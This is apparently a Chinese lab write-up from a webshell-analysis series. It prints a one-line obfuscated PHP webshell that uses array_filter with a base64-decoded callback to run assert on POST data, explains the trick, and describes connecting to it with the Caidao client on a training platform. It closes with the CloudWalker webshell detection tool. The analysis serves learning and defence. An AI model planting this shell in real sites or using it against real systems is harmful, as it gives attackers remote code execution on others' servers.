WebShell代碼分析溯源(五)

WebShell代碼分析溯源(五)

1、一句話變形馬樣本

<?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?>

2、代碼分析

一、調整代碼格式

　　

二、分析代碼

首先使用REQUEST方法接收url中e參數傳遞的值,而後把$_POST['POST']賦值給arr數組，而後把arr數組中的每一個鍵值傳給base64_decode函數，最終構成一句話木馬assert($_post['post'])

注: array_filter() 函數用回調函數過濾數組中的值　

3、漏洞環境搭建

一、這裏使用在線學習平臺墨者學院中的實驗環境(WebShell代碼分析溯源(第4題))，地址: https://www.mozhe.cn/bug/detail/ZVNlS096cEV0WHZsTzdKNHBKZXljUT09bW96aGUmozhe

二、代碼環境，下載代碼

　　

三、分析(上面已經分析過了)

四、使用菜刀鏈接

　　 

五、執行一些命令

　　

 

 　　

4、後記

學習經常使用webshell掃描檢測查殺工具---牧雲(CloudWalker)(百度WebShell掃描檢測引擎),網址: https://github.com/chaitin/cloudwalker

使用牧雲進行webshell查殺

一、經過命令檢測

　　

 

二、輸出檢測報告